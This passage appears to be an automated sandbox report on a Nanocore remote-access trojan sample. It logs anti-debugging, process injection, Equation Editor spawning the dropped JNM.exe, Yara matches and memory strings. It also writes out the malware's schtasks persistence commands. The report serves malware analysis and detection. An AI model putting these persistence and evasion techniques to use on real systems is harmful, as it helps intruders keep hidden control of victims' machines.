        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\JNM.exeWindow / User API: threadDelayed 7741
        Source: C:\Users\user\AppData\Roaming\JNM.exeWindow / User API: threadDelayed 1930
        Source: C:\Users\user\AppData\Roaming\JNM.exeWindow / User API: foregroundWindowGot 372
        Source: C:\Users\user\AppData\Roaming\JNM.exeWindow / User API: foregroundWindowGot 357
        Source: C:\Users\user\AppData\Roaming\JNM.exeWindow / User API: foregroundWindowGot 576
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 920Thread sleep time: -120000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\JNM.exe TID: 2928Thread sleep time: -60000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\JNM.exe TID: 2856Thread sleep time: -4611686018427385s >= -30000s
        Source: C:\Windows\System32\taskeng.exe TID: 2376Thread sleep time: -60000s >= -30000s
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 3024Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\JNM.exe TID: 3068Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2424Thread sleep time: -120000s >= -30000s
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2512Thread sleep time: -922337203685477s >= -30000s
        Source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information queried: ProcessInformation

        Anti Debugging:

        barindex
        Contains functionality to hide a thread from the debuggerShow sources
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 3_2_00400AC4 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,00408D77,00000000,00000000
        Hides threads from debuggersShow sources
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebugger
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebugger
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebugger
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebugger
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebugger
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebugger
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebugger
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebugger
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebugger
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebugger
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebugger
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebugger
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebugger
        Source: C:\Users\user\AppData\Roaming\JNM.exeThread information set: HideFromDebugger
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread information set: HideFromDebugger
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread information set: HideFromDebugger
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread information set: HideFromDebugger
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread information set: HideFromDebugger
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread information set: HideFromDebugger
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread information set: HideFromDebugger
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread information set: HideFromDebugger
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread information set: HideFromDebugger
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess queried: DebugPort
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess queried: DebugPort
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess queried: DebugPort
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess queried: DebugPort
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess token adjusted: Debug
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\JNM.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\user\AppData\Roaming\JNM.exeMemory written: C:\Users\user\AppData\Roaming\JNM.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\AppData\Roaming\JNM.exeMemory written: C:\Users\user\AppData\Roaming\JNM.exe base: 400000 value starts with: 4D5A
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory written: C:\Program Files (x86)\SMTP Service\smtpsvc.exe base: 400000 value starts with: 4D5A
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp'
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5A32.tmp'
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe 0
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: JNM.exe, 00000003.00000002.2356855208.0000000000ED0000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2356969483.0000000000ED0000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356001884.00000000007E0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2356959800.0000000000ED0000.00000002.00000001.sdmpBinary or memory string: Program Manager
        Source: JNM.exe, 00000003.00000002.2356855208.0000000000ED0000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2356969483.0000000000ED0000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356001884.00000000007E0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2356959800.0000000000ED0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: JNM.exe, 00000003.00000002.2356855208.0000000000ED0000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2356969483.0000000000ED0000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356001884.00000000007E0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2356959800.0000000000ED0000.00000002.00000001.sdmpBinary or memory string: !Progman
        Source: C:\Users\user\AppData\Roaming\JNM.exeQueries volume information: C:\Users\user\AppData\Roaming\JNM.exe VolumeInformation
        Source: C:\Users\user\AppData\Roaming\JNM.exeQueries volume information: C:\Users\user\AppData\Roaming\JNM.exe VolumeInformation
        Source: C:\Users\user\AppData\Roaming\JNM.exeQueries volume information: C:\Users\user\AppData\Roaming\JNM.exe VolumeInformation
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation
        Source: C:\Users\user\AppData\Roaming\JNM.exeQueries volume information: C:\Users\user\AppData\Roaming\JNM.exe VolumeInformation
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation
        Source: C:\Users\user\AppData\Roaming\JNM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY
        Source: Yara matchFile source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE

        Remote Access Functionality:

        barindex
        Detected Nanocore RatShow sources
        Source: JNM.exe, 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: JNM.exe, 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: JNM.exe, 00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: JNM.exe, 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Yara detected Nanocore RATShow sources
